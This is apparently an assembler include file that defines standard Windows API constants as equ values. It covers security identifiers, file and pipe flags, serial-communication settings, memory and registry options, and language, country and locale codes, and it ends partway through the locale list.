SECURITY_NULL_RID equ 0h
SECURITY_WORLD_RID equ 0h
SECURITY_LOCAL_RID equ 0h
SECURITY_CREATOR_OWNER_RID equ 0h
SECURITY_CREATOR_GROUP_RID equ 1h
SECURITY_DIALUP_RID equ 1h
SECURITY_NETWORK_RID equ 2h
SECURITY_BATCH_RID equ 3h
SECURITY_INTERACTIVE_RID equ 4h
SECURITY_SERVICE_RID equ 6h
SECURITY_ANONYMOUS_LOGON_RID equ 7h
SECURITY_LOGON_IDS_RID equ 5h
SECURITY_LOCAL_SYSTEM_RID equ 12h
SECURITY_NT_NON_UNIQUE equ 15h
SECURITY_BUILTIN_DOMAIN_RID equ 20h
DOMAIN_USER_RID_ADMIN equ 1F4h
DOMAIN_USER_RID_GUEST equ 1F5h
DOMAIN_GROUP_RID_ADMINS equ 200h
DOMAIN_GROUP_RID_USERS equ 201h
DOMAIN_GROUP_RID_GUESTS equ 202h
DOMAIN_ALIAS_RID_ADMINS equ 220h
DOMAIN_ALIAS_RID_USERS equ 221h
DOMAIN_ALIAS_RID_GUESTS equ 222h
DOMAIN_ALIAS_RID_POWER_USERS equ 223h
DOMAIN_ALIAS_RID_ACCOUNT_OPS equ 224h
DOMAIN_ALIAS_RID_SYSTEM_OPS equ 225h
DOMAIN_ALIAS_RID_PRINT_OPS equ 226h
DOMAIN_ALIAS_RID_BACKUP_OPS equ 227h
DOMAIN_ALIAS_RID_REPLICATOR equ 228h
SE_GROUP_MANDATORY equ 1h
SE_GROUP_ENABLED_BY_DEFAULT equ 2h
SE_GROUP_ENABLED equ 4h
SE_GROUP_OWNER equ 8h
SE_GROUP_LOGON_ID equ 0C0000000h
FILE_BEGIN equ 0
FILE_CURRENT equ 1
FILE_END equ 2
FILE_FLAG_WRITE_THROUGH equ 80000000h
FILE_FLAG_OVERLAPPED equ 40000000h
FILE_FLAG_NO_BUFFERING equ 20000000h
FILE_FLAG_RANDOM_ACCESS equ 10000000h
FILE_FLAG_SEQUENTIAL_SCAN equ 8000000h
FILE_FLAG_DELETE_ON_CLOSE equ 4000000h
FILE_FLAG_BACKUP_SEMANTICS equ 2000000h
FILE_FLAG_POSIX_SEMANTICS equ 1000000h
CREATE_NEW equ 1
CREATE_ALWAYS equ 2
OPEN_EXISTING equ 3
OPEN_ALWAYS equ 4
TRUNCATE_EXISTING equ 5
PIPE_ACCESS_INBOUND equ 1h
PIPE_ACCESS_OUTBOUND equ 2h
PIPE_ACCESS_DUPLEX equ 3h
PIPE_CLIENT_END equ 0h
PIPE_SERVER_END equ 1h
PIPE_WAIT equ 0h
PIPE_NOWAIT equ 1h
PIPE_READMODE_BYTE equ 0h
PIPE_READMODE_MESSAGE equ 2h
PIPE_TYPE_BYTE equ 0h
PIPE_TYPE_MESSAGE equ 4h
PIPE_UNLIMITED_INSTANCES equ 255
SECURITY_CONTEXT_TRACKING equ 40000h
SECURITY_EFFECTIVE_ONLY equ 80000h
SECURITY_SQOS_PRESENT equ 100000h
SECURITY_VALID_SQOS_FLAGS equ 1F0000h
SP_SERIALCOMM equ 1h
PST_UNSPECIFIED equ 0h
PST_RS232 equ 1h
PST_PARALLELPORT equ 2h
PST_RS422 equ 3h
PST_RS423 equ 4h
PST_RS449 equ 5h
PST_FAX equ 21h
PST_SCANNER equ 22h
PST_NETWORK_BRIDGE equ 100h
PST_LAT equ 101h
PST_TCPIP_TELNET equ 102h
PST_X25 equ 103h
PCF_DTRDSR equ 1h
PCF_RTSCTS equ 2h
PCF_RLSD equ 4h
PCF_PARITY_CHECK equ 8h
PCF_XONXOFF equ 10h
PCF_SETXCHAR equ 20h
PCF_TOTALTIMEOUTS equ 40h
PCF_INTTIMEOUTS equ 80h
PCF_SPECIALCHARS equ 100h
PCF_16BITMODE equ 200h
DLL_PROCESS_DETACH equ 0
DLL_PROCESS_ATTACH equ 1
DLL_THREAD_ATTACH equ 2
DLL_THREAD_DETACH equ 3
SP_PARITY equ 1h
SP_BAUD equ 2h
SP_DATABITS equ 4h
SP_STOPBITS equ 8h
SP_HANDSHAKING equ 10h
SP_PARITY_CHECK equ 20h
SP_RLSD equ 40h
BAUD_075 equ 1h
BAUD_110 equ 2h
BAUD_134_5 equ 4h
BAUD_150 equ 8h
BAUD_300 equ 10h
BAUD_600 equ 20h
BAUD_1200 equ 40h
BAUD_1800 equ 80h
BAUD_2400 equ 100h
BAUD_4800 equ 200h
BAUD_7200 equ 400h
BAUD_9600 equ 800h
BAUD_14400 equ 1000h
BAUD_19200 equ 2000h
BAUD_38400 equ 4000h
BAUD_56K equ 8000h
BAUD_128K equ 10000h
BAUD_115200 equ 20000h
BAUD_57600 equ 40000h
BAUD_USER equ 10000000h
DATABITS_5 equ 1h
DATABITS_6 equ 2h
DATABITS_7 equ 4h
DATABITS_8 equ 8h
DATABITS_16 equ 10h
DATABITS_16X equ 20h
STOPBITS_10 equ 1h
STOPBITS_15 equ 2h
STOPBITS_20 equ 4h
PARITY_NONE equ 100h
PARITY_ODD equ 200h
PARITY_EVEN equ 400h
PARITY_MARK equ 800h
PARITY_SPACE equ 1000h
DTR_CONTROL_DISABLE equ 0h
DTR_CONTROL_ENABLE equ 1h
DTR_CONTROL_HANDSHAKE equ 2h
RTS_CONTROL_DISABLE equ 0h
RTS_CONTROL_ENABLE equ 1h
RTS_CONTROL_HANDSHAKE equ 2h
RTS_CONTROL_TOGGLE equ 3h
GMEM_FIXED equ 0h
GMEM_MOVEABLE equ 2h
GMEM_NOCOMPACT equ 10h
GMEM_NODISCARD equ 20h
GMEM_ZEROINIT equ 40h
GMEM_MODIFY equ 80h
GMEM_DISCARDABLE equ 100h
GMEM_NOT_BANKED equ 1000h
GMEM_SHARE equ 2000h
GMEM_DDESHARE equ 2000h
GMEM_NOTIFY equ 4000h
GMEM_LOWER equ GMEM_NOT_BANKED
GMEM_VALID_FLAGS equ 7F72h
GMEM_INVALID_HANDLE equ 8000h
GMEM_DISCARDED equ 4000h
GMEM_LOCKCOUNT equ 0FFh
GHND equ GMEM_MOVEABLE|GMEM_ZEROINIT
GPTR equ GMEM_FIXED|GMEM_ZEROINIT
LMEM_FIXED equ 0h
LMEM_MOVEABLE equ 2h
LMEM_NOCOMPACT equ 10h
LMEM_NODISCARD equ 20h
LMEM_ZEROINIT equ 40h
LMEM_MODIFY equ 80h
LMEM_DISCARDABLE equ 0F00h
LMEM_VALID_FLAGS equ 0F72h
LMEM_INVALID_HANDLE equ 8000h
LHND equ LMEM_MOVEABLE+LMEM_ZEROINIT
LPTR equ LMEM_FIXED+LMEM_ZEROINIT
NONZEROLHND equ LMEM_MOVEABLE
NONZEROLPTR equ LMEM_FIXED
LMEM_DISCARDED equ 4000h
LMEM_LOCKCOUNT equ 0FFh
DEBUG_PROCESS equ 1h
DEBUG_ONLY_THIS_PROCESS equ 2h
CREATE_SUSPENDED equ 4h
DETACHED_PROCESS equ 8h
CREATE_NEW_CONSOLE equ 10h
NORMAL_PRIORITY_CLASS equ 20h
IDLE_PRIORITY_CLASS equ 40h
HIGH_PRIORITY_CLASS equ 80h
REALTIME_PRIORITY_CLASS equ 100h
CREATE_NEW_PROCESS_GROUP equ 200h
CREATE_NO_WINDOW equ 8000000h
PROFILE_USER equ 10000000h
PROFILE_KERNEL equ 20000000h
PROFILE_SERVER equ 40000000h
MAXLONG equ 7FFFFFFFh
THREAD_BASE_PRIORITY_MIN equ -2
THREAD_BASE_PRIORITY_MAX equ 2
THREAD_BASE_PRIORITY_LOWRT equ 15
THREAD_BASE_PRIORITY_IDLE equ -15
THREAD_PRIORITY_LOWEST equ THREAD_BASE_PRIORITY_MIN
THREAD_PRIORITY_BELOW_NORMAL equ THREAD_PRIORITY_LOWEST+1
THREAD_PRIORITY_NORMAL equ 0
THREAD_PRIORITY_HIGHEST equ THREAD_BASE_PRIORITY_MAX
THREAD_PRIORITY_ABOVE_NORMAL equ THREAD_PRIORITY_HIGHEST-1
THREAD_PRIORITY_ERROR_RETURN equ MAXLONG
THREAD_PRIORITY_TIME_CRITICAL equ THREAD_BASE_PRIORITY_LOWRT
THREAD_PRIORITY_IDLE equ THREAD_BASE_PRIORITY_IDLE
APPLICATION_ERROR_MASK equ 20000000h
ERROR_SEVERITY_SUCCESS equ 0h
ERROR_SEVERITY_INFORMATIONAL equ 40000000h
ERROR_SEVERITY_WARNING equ 80000000h
ERROR_SEVERITY_ERROR equ 0C0000000h
MINCHAR equ 80h
MAXCHAR equ 7Fh
MINSHORT equ 8000h
MAXSHORT equ 7FFFh
MINLONG equ 80000000h
MAXBYTE equ 0FFh
MAXWORD equ 0FFFFh
MAXDWORD equ 0FFFFFFFFh
LANG_NEUTRAL equ 0h
LANG_BULGARIAN equ 2h
LANG_CHINESE equ 4h
LANG_CROATIAN equ 1Ah
LANG_CZECH equ 5h
LANG_DANISH equ 6h
LANG_DUTCH equ 13h
LANG_ENGLISH equ 9h
LANG_FINNISH equ 0Bh
LANG_FRENCH equ 0Ch
LANG_GERMAN equ 7h
LANG_GREEK equ 8h
LANG_HUNGARIAN equ 0Eh
LANG_ICELANDIC equ 0Fh
LANG_ITALIAN equ 10h
LANG_JAPANESE equ 11h
LANG_KOREAN equ 12h
LANG_NORWEGIAN equ 14h
LANG_POLISH equ 15h
LANG_PORTUGUESE equ 16h
LANG_ROMANIAN equ 18h
LANG_RUSSIAN equ 19h
LANG_SLOVAK equ 1Bh
LANG_SLOVENIAN equ 24h
LANG_SPANISH equ 0Ah
LANG_SWEDISH equ 1Dh
LANG_TURKISH equ 1Fh
SUBLANG_NEUTRAL equ 0h
SUBLANG_DEFAULT equ 1h
SUBLANG_SYS_DEFAULT equ 2h
SUBLANG_CHINESE_TRADITIONAL equ 1h
SUBLANG_CHINESE_SIMPLIFIED equ 2h
SUBLANG_CHINESE_HONGKONG equ 3h
SUBLANG_CHINESE_SINGAPORE equ 4h
SUBLANG_DUTCH equ 1h
SUBLANG_DUTCH_BELGIAN equ 2h
SUBLANG_ENGLISH_US equ 1h
SUBLANG_ENGLISH_UK equ 2h
SUBLANG_ENGLISH_AUS equ 3h
SUBLANG_ENGLISH_CAN equ 4h
SUBLANG_ENGLISH_NZ equ 5h
SUBLANG_ENGLISH_EIRE equ 6h
SUBLANG_FRENCH equ 1h
SUBLANG_FRENCH_BELGIAN equ 2h
SUBLANG_FRENCH_CANADIAN equ 3h
SUBLANG_FRENCH_SWISS equ 4h
SUBLANG_GERMAN equ 1h
SUBLANG_GERMAN_SWISS equ 2h
SUBLANG_GERMAN_AUSTRIAN equ 3h
SUBLANG_ITALIAN equ 1h
SUBLANG_ITALIAN_SWISS equ 2h
SUBLANG_NORWEGIAN_BOKMAL equ 1h
SUBLANG_NORWEGIAN_NYNORSK equ 2h
SUBLANG_PORTUGUESE equ 2h
SUBLANG_PORTUGUESE_BRAZILIAN equ 1h
SUBLANG_SPANISH equ 1h
SUBLANG_SPANISH_MEXICAN equ 2h
SUBLANG_SPANISH_MODERN equ 3h
SORT_DEFAULT equ 0h
SORT_JAPANESE_XJIS equ 0h
SORT_JAPANESE_UNICODE equ 1h
SORT_CHINESE_BIG5 equ 0h
SORT_CHINESE_UNICODE equ 1h
SORT_KOREAN_KSC equ 0h
SORT_KOREAN_UNICODE equ 1h
FILE_READ_DATA equ 1h
FILE_LIST_DIRECTORY equ 1h
FILE_WRITE_DATA equ 2h
FILE_ADD_FILE equ 2h
FILE_APPEND_DATA equ 4h
FILE_ADD_SUBDIRECTORY equ 4h
FILE_CREATE_PIPE_INSTANCE equ 4h
FILE_READ_EA equ 8h
FILE_READ_PROPERTIES equ FILE_READ_EA
FILE_WRITE_EA equ 10h
FILE_WRITE_PROPERTIES equ FILE_WRITE_EA
FILE_EXECUTE equ 20h
FILE_TRAVERSE equ 20h
FILE_DELETE_CHILD equ 40h
FILE_READ_ATTRIBUTES equ 80h
FILE_WRITE_ATTRIBUTES equ 100h
FILE_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|1FFh
FILE_GENERIC_READ equ STANDARD_RIGHTS_READ|FILE_READ_DATA|FILE_READ_ATTRIBUTES|FILE_READ_EA|
SYNCHRONIZE
FILE_GENERIC_WRITE equ STANDARD_RIGHTS_WRITE|FILE_WRITE_DATA|FILE_WRITE_ATTRIBUTES|
FILE_WRITE_EA|FILE_APPEND_DATA|SYNCHRONIZE
FILE_GENERIC_EXECUTE equ STANDARD_RIGHTS_EXECUTE|FILE_READ_ATTRIBUTES|FILE_EXECUTE|SYNCHRONIZE
FILE_SHARE_READ equ 1h
FILE_SHARE_WRITE equ 2h
FILE_ATTRIBUTE_READONLY equ 1h
FILE_ATTRIBUTE_HIDDEN equ 2h
FILE_ATTRIBUTE_SYSTEM equ 4h
FILE_ATTRIBUTE_DIRECTORY equ 10h
FILE_ATTRIBUTE_ARCHIVE equ 20h
FILE_ATTRIBUTE_NORMAL equ 80h
FILE_ATTRIBUTE_TEMPORARY equ 100h
FILE_ATTRIBUTE_COMPRESSED equ 800h
FILE_NOTIFY_CHANGE_FILE_NAME equ 1h
FILE_NOTIFY_CHANGE_DIR_NAME equ 2h
FILE_NOTIFY_CHANGE_ATTRIBUTES equ 4h
FILE_NOTIFY_CHANGE_SIZE equ 8h
FILE_NOTIFY_CHANGE_LAST_WRITE equ 10h
FILE_NOTIFY_CHANGE_SECURITY equ 100h
MAILSLOT_NO_MESSAGE equ -1
MAILSLOT_WAIT_FOREVER equ -1
FILE_CASE_SENSITIVE_SEARCH equ 1h
FILE_CASE_PRESERVED_NAMES equ 2h
FILE_UNICODE_ON_DISK equ 4h
FILE_PERSISTENT_ACLS equ 8h
FILE_FILE_COMPRESSION equ 10h
FILE_VOLUME_IS_COMPRESSED equ 8000h
IO_COMPLETION_MODIFY_STATE equ 2h
IO_COMPLETION_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|3h
DUPLICATE_CLOSE_SOURCE equ 1h
DUPLICATE_SAME_ACCESS equ 2h
ACCESS_SYSTEM_SECURITY equ 1000000h
MAXIMUM_ALLOWED equ 2000000h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
GENERIC_EXECUTE equ 20000000h
GENERIC_ALL equ 10000000h
ACL_REVISION equ 2
ACL_REVISION1 equ 1
ACL_REVISION2 equ 2
ACCESS_ALLOWED_ACE_TYPE equ 0h
ACCESS_DENIED_ACE_TYPE equ 1h
SYSTEM_AUDIT_ACE_TYPE equ 2h
SYSTEM_ALARM_ACE_TYPE equ 3h
HELPINFO_WINDOW equ 1
HELPINFO_MENUITEM equ 2
OBJECT_INHERIT_ACE equ 1h
CONTAINER_INHERIT_ACE equ 2h
NO_PROPAGATE_INHERIT_ACE equ 4h
INHERIT_ONLY_ACE equ 8h
VALID_INHERIT_FLAGS equ 0Fh
SUCCESSFUL_ACCESS_ACE_FLAG equ 40h
FAILED_ACCESS_ACE_FLAG equ 80h
AclRevisionInformation equ 1
AclSizeInformation equ 2
SECURITY_DESCRIPTOR_REVISION equ 1
SECURITY_DESCRIPTOR_REVISION1 equ 1
SECURITY_DESCRIPTOR_MIN_LENGTH equ 20
SE_OWNER_DEFAULTED equ 1h
SE_GROUP_DEFAULTED equ 2h
SE_DACL_PRESENT equ 4h
SE_DACL_DEFAULTED equ 8h
SE_SACL_PRESENT equ 10h
SE_SACL_DEFAULTED equ 20h
SE_SELF_RELATIVE equ 8000h
SE_PRIVILEGE_ENABLED_BY_DEFAULT equ 1h
SE_PRIVILEGE_ENABLED equ 2h
SE_PRIVILEGE_USED_FOR_ACCESS equ 80000000h
PRIVILEGE_SET_ALL_NECESSARY equ 1
SecurityAnonymous equ 1
SecurityIdentification equ 2
REG_OPTION_RESERVED equ 0
REG_OPTION_NON_VOLATILE equ 0
REG_OPTION_VOLATILE equ 1
REG_OPTION_CREATE_LINK equ 2
REG_OPTION_BACKUP_RESTORE equ 4
REG_NONE equ 0
REG_SZ equ 1
REG_EXPAND_SZ equ 2
REG_BINARY equ 3
REG_DWORD equ 4
REG_DWORD_LITTLE_ENDIAN equ 4
REG_DWORD_BIG_ENDIAN equ 5
REG_LINK equ 6
REG_MULTI_SZ equ 7
REG_RESOURCE_LIST equ 8
REG_FULL_RESOURCE_DESCRIPTOR equ 9
REG_RESOURCE_REQUIREMENTS_LIST equ 10
REG_CREATED_NEW_KEY equ 1h
REG_OPENED_EXISTING_KEY equ 2h
REG_WHOLE_HIVE_VOLATILE equ 1h
REG_REFRESH_HIVE equ 2h
REG_NOTIFY_CHANGE_NAME equ 1h
REG_NOTIFY_CHANGE_ATTRIBUTES equ 2h
REG_NOTIFY_CHANGE_LAST_SET equ 4h
REG_NOTIFY_CHANGE_SECURITY equ 8h
REG_LEGAL_CHANGE_FILTER equ REG_NOTIFY_CHANGE_NAME|REG_NOTIFY_CHANGE_ATTRIBUTES|
REG_NOTIFY_CHANGE_LAST_SET|REG_NOTIFY_CHANGE_SECURITY
REG_LEGAL_OPTION equ REG_OPTION_RESERVED|REG_OPTION_NON_VOLATILE|REG_OPTION_VOLATILE|
REG_OPTION_CREATE_LINK|REG_OPTION_BACKUP_RESTORE
KEY_QUERY_VALUE equ 1h
KEY_SET_VALUE equ 2h
KEY_CREATE_SUB_KEY equ 4h
KEY_ENUMERATE_SUB_KEYS equ 8h
KEY_NOTIFY equ 10h
KEY_CREATE_LINK equ 20h
KEY_READ equ STANDARD_RIGHTS_READ|KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY&(-1-
SYNCHRONIZE)
KEY_WRITE equ STANDARD_RIGHTS_WRITE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|SYNCHRONIZE&(-1-
SYNCHRONIZE)
KEY_EXECUTE equ KEY_READ
KEY_ALL_ACCESS equ STANDARD_RIGHTS_ALL|KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|
KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_CREATE_LINK&(-1-SYNCHRONIZE)
EXCEPTION_DEBUG_EVENT equ 1
CREATE_THREAD_DEBUG_EVENT equ 2
CREATE_PROCESS_DEBUG_EVENT equ 3
EXIT_THREAD_DEBUG_EVENT equ 4
EXIT_PROCESS_DEBUG_EVENT equ 5
LOAD_DLL_DEBUG_EVENT equ 6
UNLOAD_DLL_DEBUG_EVENT equ 7
OUTPUT_DEBUG_STRING_EVENT equ 8
RIP_EVENT equ 9
EXCEPTION_MAXIMUM_PARAMETERS equ 15
DRIVE_REMOVABLE equ 2
DRIVE_FIXED equ 3
DRIVE_REMOTE equ 4
DRIVE_CDROM equ 5
DRIVE_RAMDISK equ 6
FILE_TYPE_UNKNOWN equ 0h
FILE_TYPE_DISK equ 1h
FILE_TYPE_CHAR equ 2h
FILE_TYPE_PIPE equ 3h
FILE_TYPE_REMOTE equ 8000h
STD_INPUT_HANDLE equ -10
STD_OUTPUT_HANDLE equ -11
STD_ERROR_HANDLE equ -12
NOPARITY equ 0
ODDPARITY equ 1
EVENPARITY equ 2
MARKPARITY equ 3
SPACEPARITY equ 4
ONESTOPBIT equ 0
ONE5STOPBITS equ 1
TWOSTOPBITS equ 2
IGNORE equ 0
INFINITE equ 0FFFFh
CBR_110 equ 110
CBR_300 equ 300
CBR_600 equ 600
CBR_1200 equ 1200
CBR_2400 equ 2400
CBR_4800 equ 4800
CBR_9600 equ 9600
CBR_14400 equ 14400
CBR_19200 equ 19200
CBR_38400 equ 38400
CBR_56000 equ 56000
CBR_57600 equ 57600
CBR_115200 equ 115200
CBR_128000 equ 128000
CBR_256000 equ 256000
CE_RXOVER equ 1h
CE_OVERRUN equ 2h
CE_RXPARITY equ 4h
CE_FRAME equ 8h
CE_BREAK equ 10h
CE_TXFULL equ 100h
CE_PTO equ 200h
CE_IOE equ 400h
CE_DNS equ 800h
CE_OOP equ 1000h
CE_MODE equ 8000h
IE_BADID equ -1
IE_OPEN equ -2
IE_NOPEN equ -3
IE_MEMORY equ -4
IE_DEFAULT equ -5
IE_HARDWARE equ -10
IE_BYTESIZE equ -11
IE_BAUDRATE equ -12
EV_RXCHAR equ 1h
EV_RXFLAG equ 2h
EV_TXEMPTY equ 4h
EV_CTS equ 8h
EV_DSR equ 10h
EV_RLSD equ 20h
EV_BREAK equ 40h
EV_ERR equ 80h
EV_RING equ 100h
EV_PERR equ 200h
EV_RX80FULL equ 400h
EV_EVENT1 equ 800h
EV_EVENT2 equ 1000h
SETXOFF equ 1
SETXON equ 2
SETRTS equ 3
CLRRTS equ 4
SETDTR equ 5
CLRDTR equ 6
RESETDEV equ 7
SETBREAK equ 8
CLRBREAK equ 9
PURGE_TXABORT equ 1h
PURGE_RXABORT equ 2h
PURGE_TXCLEAR equ 4h
PURGE_RXCLEAR equ 8h
LPTx equ 80h
MS_CTS_ON equ 10h
MS_DSR_ON equ 20h
MS_RING_ON equ 40h
MS_RLSD_ON equ 80h
S_QUEUEEMPTY equ 0
S_THRESHOLD equ 1
S_ALLTHRESHOLD equ 2
S_NORMAL equ 0
S_LEGATO equ 1
S_STACCATO equ 2
S_PERIOD512 equ 0
S_PERIOD1024 equ 1
S_PERIOD2048 equ 2
S_PERIODVOICE equ 3
S_WHITE512 equ 4
S_WHITE1024 equ 5
S_WHITE2048 equ 6
S_WHITEVOICE equ 7
S_SERDVNA equ -1
S_SEROFM equ -2
S_SERMACT equ -3
S_SERQFUL equ -4
S_SERBDNT equ -5
S_SERDLN equ -6
S_SERDCC equ -7
S_SERDTP equ -8
S_SERDVL equ -9
S_SERDMD equ -10
S_SERDSH equ -11
S_SERDPT equ -12
S_SERDFQ equ -13
S_SERDDR equ -14
S_SERDSR equ -15
S_SERDST equ -16
NMPWAIT_WAIT_FOREVER equ 0FFFFh
NMPWAIT_NOWAIT equ 1h
NMPWAIT_USE_DEFAULT_WAIT equ 0h
FS_CASE_IS_PRESERVED equ FILE_CASE_PRESERVED_NAMES
FS_CASE_SENSITIVE equ FILE_CASE_SENSITIVE_SEARCH
FS_UNICODE_STORED_ON_DISK equ FILE_UNICODE_ON_DISK
FS_PERSISTENT_ACLS equ FILE_PERSISTENT_ACLS
SECTION_QUERY equ 1h
SECTION_MAP_WRITE equ 2h
SECTION_MAP_READ equ 4h
SECTION_MAP_EXECUTE equ 8h
SECTION_EXTEND_SIZE equ 10h
SECTION_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_WRITE|
SECTION_MAP_READ|SECTION_MAP_EXECUTE|SECTION_EXTEND_SIZE
FILE_MAP_COPY equ SECTION_QUERY
FILE_MAP_WRITE equ SECTION_MAP_WRITE
FILE_MAP_READ equ SECTION_MAP_READ
FILE_MAP_ALL_ACCESS equ SECTION_ALL_ACCESS
OF_READ equ 0h
OF_WRITE equ 1h
OF_READWRITE equ 2h
OF_SHARE_COMPAT equ 0h
OF_SHARE_EXCLUSIVE equ 10h
OF_SHARE_DENY_WRITE equ 20h
OF_SHARE_DENY_READ equ 30h
OF_SHARE_DENY_NONE equ 40h
OF_PARSE equ 100h
OF_DELETE equ 200h
OF_VERIFY equ 400h
OF_CANCEL equ 800h
OF_CREATE equ 1000h
OF_PROMPT equ 2000h
OF_EXIST equ 4000h
OF_REOPEN equ 8000h
OFS_MAXPATHNAME equ 128
DONT_RESOLVE_DLL_REFERENCES equ 1h
TC_NORMAL equ 0
TC_HARDERR equ 1
TC_GP_TRAP equ 2
TC_SIGNAL equ 3
MAX_LEADBYTES equ 12
MB_PRECOMPOSED equ 1h
MB_COMPOSITE equ 2h
MB_USEGLYPHCHARS equ 4h
WC_DEFAULTCHECK equ 100h
WC_COMPOSITECHECK equ 200h
WC_DISCARDNS equ 10h
WC_SEPCHARS equ 20h
WC_DEFAULTCHAR equ 40h
CT_CTYPE1 equ 1h
CT_CTYPE2 equ 2h
CT_CTYPE3 equ 4h
C1_UPPER equ 1h
C1_LOWER equ 2h
C1_DIGIT equ 4h
C1_SPACE equ 8h
C1_PUNCT equ 10h
C1_CNTRL equ 20h
C1_BLANK equ 40h
C1_XDIGIT equ 80h
C1_ALPHA equ 100h
C2_LEFTTORIGHT equ 1h
C2_RIGHTTOLEFT equ 2h
C2_EUROPENUMBER equ 3h
C2_EUROPESEPARATOR equ 4h
C2_EUROPETERMINATOR equ 5h
C2_ARABICNUMBER equ 6h
C2_COMMONSEPARATOR equ 7h
C2_BLOCKSEPARATOR equ 8h
C2_SEGMENTSEPARATOR equ 9h
C2_WHITESPACE equ 0Ah
C2_OTHERNEUTRAL equ 0Bh
C2_NOTAPPLICABLE equ 0h
C3_NONSPACING equ 1h
C3_DIACRITIC equ 2h
C3_VOWELMARK equ 4h
C3_SYMBOL equ 8h
C3_NOTAPPLICABLE equ 0h
NORM_IGNORECASE equ 1h
NORM_IGNORENONSPACE equ 2h
NORM_IGNORESYMBOLS equ 4h
MAP_FOLDCZONE equ 10h
MAP_PRECOMPOSED equ 20h
MAP_COMPOSITE equ 40h
MAP_FOLDDIGITS equ 80h
LCMAP_LOWERCASE equ 100h
LCMAP_UPPERCASE equ 200h
LCMAP_SORTKEY equ 400h
LCMAP_BYTEREV equ 800h
SORT_STRINGSORT equ 1000h
CP_ACP equ 0
CP_OEMCP equ 1
CTRY_DEFAULT equ 0
CTRY_AUSTRALIA equ 61
CTRY_AUSTRIA equ 43
CTRY_BELGIUM equ 32
CTRY_BRAZIL equ 55
CTRY_CANADA equ 2
CTRY_DENMARK equ 45
CTRY_FINLAND equ 358
CTRY_FRANCE equ 33
CTRY_GERMANY equ 49
CTRY_ICELAND equ 354
CTRY_IRELAND equ 353
CTRY_ITALY equ 39
CTRY_JAPAN equ 81
CTRY_MEXICO equ 52
CTRY_NETHERLANDS equ 31
CTRY_NEW_ZEALAND equ 64
CTRY_NORWAY equ 47
CTRY_PORTUGAL equ 351
CTRY_PRCHINA equ 86
CTRY_SOUTH_KOREA equ 82
CTRY_SPAIN equ 34
CTRY_SWEDEN equ 46
CTRY_SWITZERLAND equ 41
CTRY_TAIWAN equ 886
CTRY_UNITED_KINGDOM equ 44
CTRY_UNITED_STATES equ 1
LOCALE_NOUSEROVERRIDE equ 80000000h
LOCALE_USER_DEFAULT equ 0000h
LOCALE_ILANGUAGE equ 1h
LOCALE_SLANGUAGE equ 2h
LOCALE_SENGLANGUAGE equ 1001h
LOCALE_SABBREVLANGNAME equ 3h
LOCALE_SNATIVELANGNAME equ 4h
LOCALE_ICOUNTRY equ 5h
LOCALE_SCOUNTRY equ 6h
LOCALE_SENGCOUNTRY equ 1002h
LOCALE_SABBREVCTRYNAME equ 7h
LOCALE_SNATIVECTRYNAME equ 8h
LOCALE_IDEFAULTLANGUAGE equ 9h
LOCALE_IDEFAULTCOUNTRY equ 0Ah
LOCALE_IDEFAULTCODEPAGE equ 0Bh
LOCALE_SLIST equ 0Ch
LOCALE_IMEASURE equ 0Dh
LOCALE_SDECIMAL equ 0Eh
LOCALE_STHOUSAND equ 0Fh
LOCALE_SGROUPING equ 10h
LOCALE_IDIGITS equ 11h
LOCALE_ILZERO equ 12h
LOCALE_SNATIVEDIGITS equ 13h
LOCALE_SCURRENCY equ 14h
LOCALE_SINTLSYMBOL equ 15h
LOCALE_SMONDECIMALSEP equ 16h
LOCALE_SMONTHOUSANDSEP equ 17h
LOCALE_SMONGROUPING equ 18h
LOCALE_ICURRDIGITS equ 19h
LOCALE_IINTLCURRDIGITS equ 1Ah
LOCALE_ICURRENCY equ 1Bh
LOCALE_INEGCURR equ 1Ch
LOCALE_SDATE equ 1Dh
LOCALE_STIME equ 1Eh
LOCALE_SSHORTDATE equ 1Fh
LOCALE_SLONGDATE equ 20h
LOCALE_STIMEFORMAT equ 1003h
LOCALE_IDATE equ 21h
LOCALE_ILDATE equ 22h
LOCALE_ITIME equ 23h
LOCALE_ICENTURY equ 24h
LOCALE_ITLZERO equ 25h
LOCALE_IDAYLZERO equ 26h
LOCALE_IMONLZERO equ 27h
LOCALE_S1159 equ 28h
LOCALE_S2359 equ 29h
LOCALE_SDAYNAME1 equ 2Ah
LOCALE_SDAYNAME2 equ 2Bh
LOCALE_SDAYNAME3 equ 2Ch
LOCALE_SDAYNAME4 equ 2Dh
LOCALE_SDAYNAME5 equ 2Eh
LOCALE_SDAYNAME6 equ 2Fh
LOCALE_SDAYNAME7 equ 30h
LOCALE_SABBREVDAYNAME1 equ 31h
LOCALE_SABBREVDAYNAME2 equ 32h
LOCALE_SABBREVDAYNAME3 equ 33h
LOCALE_SABBREVDAYNAME4 equ 34h
LOCALE_SABBREVDAYNAME5 equ 35h
LOCALE_SABBREVDAYNAME6 equ 36h
LOCALE_SABBREVDAYNAME7 equ 37h
LOCALE_SMONTHNAME1 equ 38h
LOCALE_SMONTHNAME2 equ 39h
LOCALE_SMONTHNAME3 equ 3Ah
LOCALE_SMONTHNAME4 equ 3Bh
LOCALE_SMONTHNAME5 equ 3Ch
LOCALE_SMONTHNAME6 equ 3Dh
LOCALE_SMONTHNAME7 equ 3Eh
LOCALE_SMONTHNAME8 equ 3Fh
LOCALE_SMONTHNAME9 equ 40h
LOCALE_SMONTHNAME10 equ 41h
LOCALE_SMONTHNAME11 equ 42h
LOCALE_SMONTHNAME12 equ 43h
LOCALE_SABBREVMONTHNAME1 equ 44h
LOCALE_SABBREVMONTHNAME2 equ 45h
LOCALE_SABBREVMONTHNAME3 equ 46h
LOCALE_SABBREVMONTHNAME4 equ 47h
LOCALE_SABBREVMONTHNAME5 equ 48h
LOCALE_SABBREVMONTHNAME6 equ 49h
LOCALE_SABBREVMONTHNAME7 equ 4Ah
LOCALE_SABBREVMONTHNAME8 equ 4Bh
LOCALE_SABBREVMONTHNAME9 equ 4Ch
LOCALE_SABBREVMONTHNAME10 equ 4Dh
